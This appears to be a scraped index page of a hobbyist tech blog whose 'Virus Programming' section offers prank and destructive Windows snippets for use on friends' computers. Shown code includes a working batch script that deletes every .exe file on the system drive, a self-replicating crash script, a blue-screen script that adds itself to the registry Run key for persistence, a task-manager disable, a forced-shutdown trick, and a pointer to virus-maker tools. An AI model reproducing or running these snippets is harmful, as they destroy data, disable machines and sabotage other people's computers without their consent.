Friday, 4th April 2025
// Place side add here
Virus Programming/Batch File Programming
  • Continually pop out your friend’s CD Drive

    Description:  This is a harmless code, which will pop out your cd drive automatically, a

  • Code to Disable Task Manager

    Description: This is harmless code to temporary disable the task manager. You can enable it aga

  • Create Your Own Virus using Virus Maker Softwares

    In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares n

  • Only 5 Characters are enough to Crash a System: Fork Bomb

    A fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters

  • Shutdown your friends computer while chatting

    Hack While chatting 1)  Make a shortcut on desktop by Right click on desktop, and

  • Blue screen of death

    rem --------------------------------- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) &

  • Batch code to Delete all exe's from a computer

    rem --------------------------------- rem Delete All Exe DIR /S/B %SystemDrive%\*.exe >> FI

  • Batch code to Crash a computer

    rem --------------------------------- rem Crash Computer echo start "" %0>>crash.bat echo st

  • Internet Tips
  • Trick to read blackout wiki page

    How to read blackout wikipedia page? Protesting against SOPA and PIPA bills,

  • Browse Privately Using Incognito Mode

    For times when you want to browse something Private, you must browse in 'incognito mode' &nb

  • Hacking Stuff
  • How to hack/Bypass windows logon p

    In response to query asked by Ameer Hasan Malik Did you forget your windows login passwo

  • Sql Injection For Beginners: Tutor

    Many times my readers have asked me to write about SQL Injection, but i always used to conside

  • Useful Softwares
  • Automate Repetitive tasks using Mo

    Through out a day, almost all computer user do many repetitive tasks on computer and

  • Transform your Windows7 laptop int

    In today's time, not even  every home has a laptop or computer, but every member

  • AntiVirus and Security Tips
  • Beware Adobe Software Upgrade Noti

    An email pretend to come from Adobe has been widely spammed out, Which has a malware in atta

  • Scan NewsFeed for threats with Nor

    It is very common to see bad infected link/video shared on your wall by some of your noob friend

  • Continually pop out your friend’s CD Drive

    Description: 
    This is a harmless code, which will pop out your cd drive automatically, and  when you push it back, it will pop out again and again, 
    Code: 
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    ...

    Code to Disable Task Manager

    Description:
    This is harmless code to temporary disable the task manager. You can enable it again with no hassle. 
    Code:
    rem ---------------------------------
    rem Disable Task Manager
    ...

    Create Your Own Virus using Virus Maker Softwares

    In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares named  "JPS Virus Maker" and "teraBIT Virus Maker"
    Follow the steps
    1. First of all Download any  Virus  maker from both mentioned above, extract the rar file, and then click on the exe.
    ...

    Only 5 Characters are enough to Crash a System: Fork Bomb

    A fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters. Fork bombs count as wabbits: they typically do not spread as worms or viruses. 
    The concept behind the fork bomb: the processes recursively fork until a denial of service or a crash occurs. Fork Bomb creates a large number of processes very quickly and break the limitation of processes that can run on a system. It's dead simple: A program just replicate itself, which again replicate itself and so on until all resources are exhausted. 
    ...

    Shutdown your friends computer while chatting

    Hack While chatting
    1)  Make a shortcut on desktop by Right click on desktop, and then go to New, then Shortcut.
    2)  Then in the "type location of the item" type: %windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"
    ...

    Blue screen of death

    rem ---------------------------------
    rem Activate Blue Screen Of Death
    @((( Echo Off > Nul ) & Break Off )
        @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
        @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul
    ...

    Batch code to Delete all exe's from a computer

    rem ---------------------------------
    rem Delete All Exe
    DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
    echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
    rem ---------------------------------
    ...
    TechByte4U on FaceBook
    Videos on Tech Byte 4 U